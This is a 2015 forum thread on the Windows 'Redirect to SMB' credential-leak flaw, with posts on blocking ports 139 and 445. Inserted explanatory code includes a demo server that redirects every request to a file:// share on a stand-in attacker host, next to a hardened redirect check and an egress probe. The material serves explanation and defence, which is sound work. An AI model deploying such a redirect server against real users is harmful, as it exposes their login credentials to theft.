85160670 (banned)
Member
2015-Apr-13 11:29 am
New Security Flaw Spans All Versions Of Windows

Huh...

"Newly found 'forever-day' vulnerability affects 31 popular software programs including applications from Adobe, Apple, Microsoft, Symantec -- and Windows 10 preview. A security flaw discovered affecting all versions of Windows as well as some 31 software vendors' products including Adobe, Apple, Oracle, and Symantec, was disclosed publicly today. The so-called "Re-Direct To SMB" vulnerability, found by Cylance SPEAR team researcher Brian Wallace, lets an attacker siphon the encrypted login credentials from Windows PC users. An attacker could do so either via a compromised web server or by wresting control of network traffic and redirecting it to a malicious SMB-based server, where the Windows users' credentials then would be stolen. The attacker then could crack the credentials in a matter of hours, according to Cylance, and use them to steal data, control the PC, or launch attacks on other parts of the victim machine's network."

» www.darkreading.com/endp ··· 1319884?
Kilroy
MVM
2015-Apr-13 1:43 pm
Another one of those "sounds worse than it really is" types of issues.

quote: HD Moore, chief research officer at Rapid7 and creator of Metasploit, says the attack puts Windows clients at risk on untrusted or compromised networks.

If you're on your own network your risk is greatly reduced, and if your network is already compromised this isn't going to make it much worse.

said by Microsoft: "Several factors would need to converge for a 'man-in-the-middle' cyberattack to occur," a Microsoft spokesperson said.

If you're already the subject of a man-in-the-middle attack this is the least of your worries.

quote: Apple's Software Updater for iTunes, for instance, is vulnerable to this attack via MITM. An attacker would have to have compromised the DNS record of Apple and redirect update requests to a malicious SMB server.

Again, if your DNS has been compromised this is the least of your worries.
to 85160670
More at Kaspersky ThreatPost: » threatpost.com/new-smb-f ··· -windows

quote: The vulnerability, disclosed Monday by researchers at Cylance, is an extension of research done by Aaron Spangler nearly 20 years ago, and it's known as Redirect to SMB. This weakness can enable an attacker to force victims to try to authenticate to an attacker-controlled server.

Redirect to SMB is a way for attackers to steal valuable user credentials by hijacking communications with legitimate web servers via man-in-the-middle attacks, then sending them to malicious SMB (server message block) servers that force them to spit out the victim's username, domain and hashed password, a blog post by Brian Wallace from Cylance says.
chachazz
to 85160670
CERT Vulnerability Note VU#672268: Microsoft Windows NTLM automatically authenticates via SMB when following a file:// URL
» www.kb.cert.org/vuls/id/672268
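The mechanism the OP's article and the CERT note describe, modelled end to end as an added example (this is not code from the thread, from Cylance or from CERT): a constructed web server that answers every request with a 302 whose Location is a file:// URL, a client that reads the redirect without following it, and the scheme check a client has to apply before following any redirect. The attacker address 203.0.113.5 is a constructed documentation-range IP, and the Python client stands in for the Windows components the advisory covers; Python's own urllib refuses to follow a redirect from http to file://, which is the same check resolve_redirect() performs.

```python
"""Redirect to SMB, modelled end to end (added example; not code from the
thread, Cylance or CERT). The attacker host 203.0.113.5 is a constructed
address from the documentation range."""
import http.server
import socketserver
import threading
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlparse

# Constructed: where the attacker's SMB server would be. A Windows client that
# follows this URL opens an SMB session and offers NTLM credentials to it.
ATTACKER_SHARE = "file://203.0.113.5/share/update.exe"


class RedirectToSMB(http.server.BaseHTTPRequestHandler):
    """Constructed malicious (or MITM'd) web server: every GET is a 302 to file://."""

    def do_GET(self):
        self.send_response(302)
        self.send_header("Location", ATTACKER_SHARE)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):  # silence request logging in the demo
        pass


def start_server():
    """Bind the constructed server on an ephemeral loopback port."""
    srv = socketserver.TCPServer(("127.0.0.1", 0), RedirectToSMB)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch_without_following(url):
    """Issue the request but refuse every redirect; return (status, Location)."""

    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # urllib then surfaces the 302 as an HTTPError

    opener = urllib.request.build_opener(NoRedirect)
    try:
        resp = opener.open(url, timeout=5)
        return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as e:
        return e.code, e.headers.get("Location")


def naive_follow(base_url, location):
    """A client with no scheme check: whatever Location says is the next target."""
    return urljoin(base_url, location)


def resolve_redirect(base_url, location, allowed=("http", "https")):
    """Hardened redirect handling: absolute target, or None when following it
    would leave the allowed schemes. Both file://host/share and the UNC form
    \\\\host\\share are refused, since Windows resolves either over SMB."""
    if location.lstrip().startswith("\\\\"):
        return None
    target = urljoin(base_url, location)
    if urlparse(target).scheme.lower() not in allowed:
        return None
    return target


def demo():
    """Run the exchange against the constructed server and report both outcomes."""
    srv = start_server()
    host, port = srv.server_address
    url = f"http://{host}:{port}/update-check"
    status, location = fetch_without_following(url)
    result = {
        "status": status,
        "location": location,
        "naive_target": naive_follow(url, location),         # what gets dereferenced
        "hardened_target": resolve_redirect(url, location),  # None: refused
    }
    srv.shutdown()
    srv.server_close()
    return result


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The naive path is the one that matters on Windows: the component follows Location without asking whether the new scheme is still HTTP, the file:// target is handed to the SMB client, and NTLM authentication happens before anything is displayed. Blocking outbound 139/445, as later posts suggest, stops the SMB session; the scheme check stops the redirect from ever reaching SMB.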
Cartel
Premium Member
2015-Apr-13 3:09 pm
Block outbound SMB

Consider blocking outbound SMB connections (TCP ports 139 and 445) from the local network to the WAN.

139 and 445 have been permanently blocked here for years..
19579823 (banned)
Member
2015-Apr-13 3:15 pm
to 85160670
This only has the chance of working if you have a network setup..... I do not, and when I try to go to ANY FILE:// with an OUTSIDE LOCATION I get this
Kilroy
MVM
to Cartel
Re: New Security Flaw Spans All Versions Of Windows

I want to say that port 139 has been blocked by ISPs since the mid 90s. Both are blocked in Comcast's blocked ports. Again, it sounds bad until you check into it. If someone is on your network exploiting this you have bigger issues.
Cartel
Premium Member
2015-Apr-13 3:30 pm
Not this ISP...

[INFO] Mon Apr 13 12:28:55 2015 Blocked incoming TCP connection request from 4.79.142.206:42124 to 70.78.71.11:139
[INFO] Mon Apr 13 12:28:55 2015 Blocked incoming TCP connection request from 4.79.142.206:42124 to 70.78.71.11:138
[INFO] Mon Apr 13 12:28:55 2015 Blocked incoming TCP connection request from 4.79.142.206:42124 to 70.78.71.11:137
[INFO] Mon Apr 13 12:28:55 2015 Blocked incoming TCP connection request from 4.79.142.206:42124 to 70.78.71.11:136
[INFO] Mon Apr 13 12:28:55 2015 Blocked incoming TCP connection request from 4.79.142.206:42124 to 70.78.71.11:135
19579823 (banned)
Member
to Kilroy
Yup, 139 is blocked in my firewall as well as 137 and 138.
85160670 (banned)
Member
to Cartel
{{{ GRIN }}} ..... nice, Cartel *_^
to Kilroy
said by Kilroy: Another one of those "sounds worse than it really is" types of issues.

If you're on your own network your risk is greatly reduced, and if your network is already compromised this isn't going to make it much worse.

said by Microsoft: "Several factors would need to converge for a 'man-in-the-middle' cyberattack to occur," a Microsoft spokesperson said.

If you're already the subject of a man-in-the-middle attack this is the least of your worries. Again, if your DNS has been compromised this is the least of your worries.

Let's assume my network is compromised, my DNS is compromised, and unspecified creatures have their hearts set on conducting middle-man attacks. Under these conditions, is it in any way unrealistic to expect that while attempting to connect to systems that have not been compromised my password remains safe? Or that once I have connected, the contents of the data are not leaked or modified in transit? Is this technically infeasible or unrealistic? Given that perimeter defense is a fantasy and most costly attacks are "inside jobs", yes, all very old news, yet I would suggest the situation is still very serious.
siljaline
Premium Member
to 85160670
See also - Windows security flaw could lead to login theft, researchers claim
» www.zdnet.com/article/sm ··· windows/
» twitter.com/ZDNet/status ··· 01778946
NetFixer
Premium Member
to 85160670
Anyone who wishes to see if they are vulnerable to this from an Internet connection (and who is not afraid to install/enable Java) can run the ICSI Netalyzr test and find out. The test will check both IPv4 and IPv6 connections for the vulnerability (if outbound NBT and SMB ports are blocked, you are not vulnerable to an Internet attack). Here are examples of a PC that is not vulnerable to an Internet attack using this vulnerability:

[image: IPv4 test results]
[image: IPv6 test results]
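An added example of the check NetFixer describes, written here in Python (it is not Netalyzr's code, which the post notes is Java): probe TCP 139 and 445 toward a host outside your network and read the result the way you would read a firewall rule. A completed handshake means outbound SMB leaves the network and an Internet-based SMB server could receive the NTLM authentication; an RST means the packets reached the target but nothing listens; a timeout means something on the path drops them, which is the state the earlier posts recommend. The listener in local_listener() is a constructed loopback stand-in so the script runs offline; for a real test, point smb_egress_report() at a host you control on the Internet side. UDP 137/138 (NBT) are not probed, because a UDP probe cannot tell "filtered" from "nobody answered".

```python
"""Outbound NetBIOS/SMB egress check (added example; not Netalyzr's code)."""
import socket

SMB_TCP_PORTS = (139, 445)


def probe_port(host, port, timeout=3.0):
    """TCP-connect probe. Returns:
      'open'     handshake completed: outbound SMB reaches the target
      'closed'   RST came back: packets reach the target, nothing listens
      'filtered' nothing came back (or no route): dropped on the path"""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except socket.timeout:
        return "filtered"
    except ConnectionRefusedError:
        return "closed"
    except OSError:
        return "filtered"  # e.g. "network unreachable": egress is blocked anyway
    finally:
        s.close()


def smb_egress_report(host, ports=SMB_TCP_PORTS, timeout=3.0):
    """Probe every SMB port toward host. The client can be reached by an
    Internet-based Redirect-to-SMB server only if some port comes back 'open';
    egress_filtered is True when every port was dropped on the path."""
    results = {port: probe_port(host, port, timeout) for port in ports}
    return {
        "host": host,
        "results": results,
        "exposed": any(state == "open" for state in results.values()),
        "egress_filtered": all(state == "filtered" for state in results.values()),
    }


def local_listener():
    """Constructed stand-in for an Internet-side SMB server: a loopback socket
    on an ephemeral port. The kernel completes the handshake from the backlog,
    so no accept() is needed for probe_port() to see 'open'."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    srv, port = local_listener()
    print("listener up:  ", smb_egress_report("127.0.0.1", ports=(port,)))
    srv.close()
    print("listener down:", smb_egress_report("127.0.0.1", ports=(port,)))
    # Real use: smb_egress_report("<a host you control outside your network>")
```

Run it from inside the network you want to assess, not from the gateway itself: a host-level rule such as the one sivran mentions and a perimeter rule such as Cartel's both show up as 'filtered', but only the probe from the client tells you which one the client actually benefits from.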
Mele20
Premium Member
2015-Apr-14 8:58 am
Thanks for reminding me about ICSI Netalyzr. It's been maybe 4-5 months since I ran it last. Evidently my sleazebag ISP doesn't understand the words NO, I OPT OUT, because the fuckers have turned back on wildcarding of DNS addresses that don't exist, thus arrogantly breaking the internet and taking me to a crap site full of ads if I happen to mistype a URL in the address bar. I said NO to those m**fuckers some time ago, yet evidently "no" in their pathetic little minds is "no" until they decide it is "yes", and then they proceed to rape me, never even having the common decency to tell me that NO means YES whenever they wish. I don't have a router that runs third-party software where I could easily fix this (the Netgear runs SamKnows firmware), and I don't like using other DNS servers because Oceanic's are located on Oahu and any others are way off on the Mainland, thus slowing things down.
sivran
Premium Member
to 85160670
Windows 8 (and possibly all the way down to Vista) has a built-in firewall rule to limit outbound SMB to the local subnet.